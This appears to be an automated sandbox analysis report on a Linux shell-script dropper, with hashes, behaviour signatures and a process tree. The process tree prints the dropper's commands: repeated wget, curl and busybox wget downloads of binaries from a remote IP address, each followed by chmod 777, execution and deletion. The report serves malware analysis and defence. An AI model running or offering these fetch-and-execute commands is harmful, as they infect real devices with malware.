Analysis
-
max time kernel
146s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 859 chmod 824 chmod 925 chmod 943 chmod 949 chmod 785 chmod 841 chmod 919 chmod 961 chmod 753 chmod 889 chmod 955 chmod 883 chmod 793 chmod 847 chmod 901 chmod 907 chmod 865 chmod 877 chmod 895 chmod 913 chmod 931 chmod 727 chmod 799 chmod 853 chmod 719 chmod 871 chmod 937 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 721 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 728 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 754 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 786 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 794 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 801 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 826 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 842 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 848 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 854 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 860 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 866 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 872 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 878 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 884 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 890 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 896 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 902 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 908 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 914 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 920 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 926 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 932 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 938 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 944 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 950 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 956 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 962 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:690
-
/bin/rm/bin/rm bins.sh2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:696
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:715
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:721
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:723
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:726
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:732
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:781
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:792
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:798
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:821
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:840
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:846
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:852
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:858
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:864
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:870
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:876
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:882
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:888
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:894
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:900
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:906
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:912
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:918
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
